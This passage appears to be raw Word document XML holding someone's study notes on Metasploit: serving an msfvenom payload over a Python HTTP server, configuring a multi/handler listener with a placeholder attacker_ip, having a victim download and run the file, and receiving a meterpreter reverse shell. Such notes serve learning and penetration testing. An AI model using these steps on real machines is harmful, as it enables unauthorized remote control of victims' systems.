      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BB4404" w14:textId="77777777" w:rsidR="00381307" w:rsidRDefault="00381307"/>
    <w:p w14:paraId="3D256A33" w14:textId="0590980B" w:rsidR="00381307" w:rsidRDefault="00381307">
      <w:r>
        <w:t xml:space="preserve"> Sudo python -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>simpleHTTPServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CC51D5" w14:textId="4199A583" w:rsidR="00381307" w:rsidRDefault="00381307">
      <w:r>
        <w:t># in which you run this command it will make the file in it accessible online</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABC9880" w14:textId="77777777" w:rsidR="00381307" w:rsidRDefault="00381307"/>
    <w:p w14:paraId="2D0CDCA3" w14:textId="77777777" w:rsidR="00381307" w:rsidRDefault="00381307"/>
    <w:p w14:paraId="7D5003CE" w14:textId="01A60DC5" w:rsidR="00381307" w:rsidRPr="00381307" w:rsidRDefault="00381307">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00381307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Setup</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00381307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> the handler:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54613B55" w14:textId="41E28BE4" w:rsidR="00381307" w:rsidRDefault="00381307">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>when</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we are dealing with the payload that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>are</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> advanced like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  payload</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">  we need appropriate listener to handle the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_connection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or connection form the victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D26E70" w14:textId="77777777" w:rsidR="00381307" w:rsidRDefault="00381307"/>
    <w:p w14:paraId="4DC0B3F7" w14:textId="33E176C5" w:rsidR="00381307" w:rsidRDefault="00381307">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4B959F" w14:textId="77777777" w:rsidR="00381307" w:rsidRDefault="00381307"/>
    <w:p w14:paraId="430EC856" w14:textId="477735BE" w:rsidR="00381307" w:rsidRDefault="00381307">
      <w:r>
        <w:t>Use multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0252715F" w14:textId="1897D67B" w:rsidR="00381307" w:rsidRDefault="00381307">
      <w:r>
        <w:t xml:space="preserve"># it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>show</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the payload that is configured, you can change that according to your payload and same as you </w:t>
      </w:r>
      <w:r w:rsidRPr="00381307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">created with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00381307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00381307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410E3545" w14:textId="77777777" w:rsidR="00381307" w:rsidRDefault="00381307"/>
    <w:p w14:paraId="5737413E" w14:textId="1788BFEE" w:rsidR="00381307" w:rsidRDefault="00381307">
      <w:r>
        <w:t>Set payload /windows/x86/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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DDA828" w14:textId="77777777" w:rsidR="00381307" w:rsidRDefault="00381307"/>
    <w:p w14:paraId="293878D3" w14:textId="79643131" w:rsidR="00381307" w:rsidRDefault="00381307">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1C0BE6" w14:textId="0F9C820C" w:rsidR="00381307" w:rsidRDefault="00381307">
      <w:r>
        <w:t xml:space="preserve">Set LHOST </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attacker_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6BB8DA01" w14:textId="77777777" w:rsidR="00381307" w:rsidRDefault="00381307">
      <w:r>
        <w:t xml:space="preserve">Set LPORT 1234 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619FFE7E" w14:textId="4B9D46FB" w:rsidR="00381307" w:rsidRDefault="00381307">
      <w:r>
        <w:t xml:space="preserve"># same as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> payload that is on the victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E33A4EF" w14:textId="4BE8A18A" w:rsidR="00381307" w:rsidRPr="00240F54" w:rsidRDefault="00240F54">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00240F54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Now move to window:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667DA6AE" w14:textId="77777777" w:rsidR="00240F54" w:rsidRDefault="00240F54"/>
    <w:p w14:paraId="59D4C282" w14:textId="3BD5CDBB" w:rsidR="00240F54" w:rsidRDefault="00240F54">
      <w:r>
        <w:t>Visit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D971528" w14:textId="2265FCAF" w:rsidR="00240F54" w:rsidRDefault="00240F54">
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00CF5245">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://attacker_ip/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7BE928D1" w14:textId="77777777" w:rsidR="00240F54" w:rsidRDefault="00240F54"/>
    <w:p w14:paraId="13769741" w14:textId="67C39476" w:rsidR="00240F54" w:rsidRDefault="00240F54">
      <w:r>
        <w:t>download the file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491CAC94" w14:textId="77777777" w:rsidR="00240F54" w:rsidRDefault="00240F54"/>
    <w:p w14:paraId="0EB1B6A4" w14:textId="2BCD0D58" w:rsidR="00240F54" w:rsidRDefault="00240F54">
      <w:r>
        <w:t>and then execute it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3BF49F" w14:textId="77777777" w:rsidR="00240F54" w:rsidRDefault="00240F54"/>
    <w:p w14:paraId="01F68BA3" w14:textId="63710E8D" w:rsidR="00240F54" w:rsidRPr="00240F54" w:rsidRDefault="00240F54">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00240F54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>On the kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFF9641" w14:textId="77777777" w:rsidR="00240F54" w:rsidRDefault="00240F54"/>
    <w:p w14:paraId="6EE49E38" w14:textId="29B326EF" w:rsidR="00240F54" w:rsidRDefault="00240F54">
      <w:r>
        <w:t xml:space="preserve">We received </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session on our kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AED1B4D" w14:textId="77777777" w:rsidR="00240F54" w:rsidRDefault="00240F54"/>
    <w:p w14:paraId="79AB6C34" w14:textId="66DF08B0" w:rsidR="00240F54" w:rsidRDefault="00240F54">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330D8823" w14:textId="77777777" w:rsidR="00240F54" w:rsidRDefault="00240F54"/>
    <w:p w14:paraId="2D000472" w14:textId="3086FDA5" w:rsidR="009019E0" w:rsidRPr="00DD3842" w:rsidRDefault="00DD3842">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD3842">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Same process is for Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC541BA" w14:textId="77777777" w:rsidR="00DD3842" w:rsidRDefault="00DD3842"/>
    <w:p w14:paraId="267DD744" w14:textId="77777777" w:rsidR="007936CE" w:rsidRDefault="007936CE"/>
    <w:p w14:paraId="5714EB0B" w14:textId="77777777" w:rsidR="00DD3842" w:rsidRDefault="00DD3842"/>
    <w:p w14:paraId="08DAC3FC" w14:textId="77777777" w:rsidR="00381307" w:rsidRDefault="00381307"/>
    <w:p w14:paraId="302179C6" w14:textId="77777777" w:rsidR="00381307" w:rsidRDefault="00381307"/>
    <w:p w14:paraId="1970F552" w14:textId="77777777" w:rsidR="00381307" w:rsidRDefault="00381307"/>
    <w:p w14:paraId="50A5CBE7" w14:textId="77777777" w:rsidR="00381307" w:rsidRDefault="00381307"/>
    <w:p w14:paraId="08B2AE33" w14:textId="77777777" w:rsidR="008E63C3" w:rsidRDefault="008E63C3"/>
    <w:p w14:paraId="3A8116A1" w14:textId="77777777" w:rsidR="00C376FC" w:rsidRDefault="00C376FC"/>
    <w:p w14:paraId="313C4B1F" w14:textId="77777777" w:rsidR="00C376FC" w:rsidRPr="00C376FC" w:rsidRDefault="00C376FC"/>
    <w:p w14:paraId="204BEEDF" w14:textId="77777777" w:rsidR="00C376FC" w:rsidRDefault="00C376FC"/>
    <w:p w14:paraId="52BBEDA5" w14:textId="77777777" w:rsidR="00C376FC" w:rsidRDefault="00C376FC"/>
    <w:p w14:paraId="4AF3E4C0" w14:textId="2DADE282" w:rsidR="00C376FC" w:rsidRDefault="00C376FC"/>
    <w:p w14:paraId="42FCDB55" w14:textId="4068D95B" w:rsidR="00C42332" w:rsidRPr="00C42332" w:rsidRDefault="00C42332">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C42332">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E59D65" w14:textId="6482B9D3" w:rsidR="00C42332" w:rsidRDefault="008E63C3">
      <w:r>
        <w:t>Elf = extensible linking format (</w:t>
      </w:r>
      <w:r w:rsidR="007936CE">
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BC5182" w14:textId="77777777" w:rsidR="008E63C3" w:rsidRDefault="008E63C3"/>
    <w:p w14:paraId="772B4CD5" w14:textId="2DD634B6" w:rsidR="00935B3A" w:rsidRDefault="00935B3A">
      <w:r>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the x64</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> you must mention the system architecture in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the x86</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> if you </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>donot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> be </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ablr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to mention then it will automatically give the payload x86 architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562636E6" w14:textId="646C3C24" w:rsidR="00935B3A" w:rsidRDefault="00F3719F">
      <w:r>
        <w:t xml:space="preserve">Buth it’s good </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>practice  to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> mention for both architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C489FAA" w14:textId="59E742DF" w:rsidR="00F3719F" w:rsidRDefault="00F3719F">
      <w:r>
        <w:t xml:space="preserve">Both with -a   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>and also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in the payload name.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F37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81DFD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5388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38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29"/>
    <w:rsid w:val="0001550E"/>
    <w:rsid w:val="0004222B"/>
    <w:rsid w:val="0011595C"/>
    <w:rsid w:val="00240F54"/>
    <w:rsid w:val="00251D4F"/>
    <w:rsid w:val="00354329"/>
    <w:rsid w:val="00381307"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="006B2805"/>
    <w:rsid w:val="006E6591"/>
    <w:rsid w:val="007724E8"/>
    <w:rsid w:val="007936CE"/>
    <w:rsid w:val="00827872"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="008851A5"/>
    <w:rsid w:val="008E63C3"/>
    <w:rsid w:val="009019E0"/>
    <w:rsid w:val="00935B3A"/>
    <w:rsid w:val="00961EC6"/>
    <w:rsid w:val="00AB08A9"/>
    <w:rsid w:val="00B7705E"/>
    <w:rsid w:val="00C376FC"/>
    <w:rsid w:val="00C42332"/>
    <w:rsid w:val="00D105E4"/>
    <w:rsid w:val="00DD3842"/>
    <w:rsid w:val="00F046F5"/>
    <w:rsid w:val="00F3719F"/>
    <w:rsid w:val="00FE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DC41"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E1DAC2FE-3513-402B-B897-1301296C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3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ttacker_ip/" TargetMode="Externa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568</Words>
  <Characters>3364</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>140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37</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-03T09:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-04T07:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>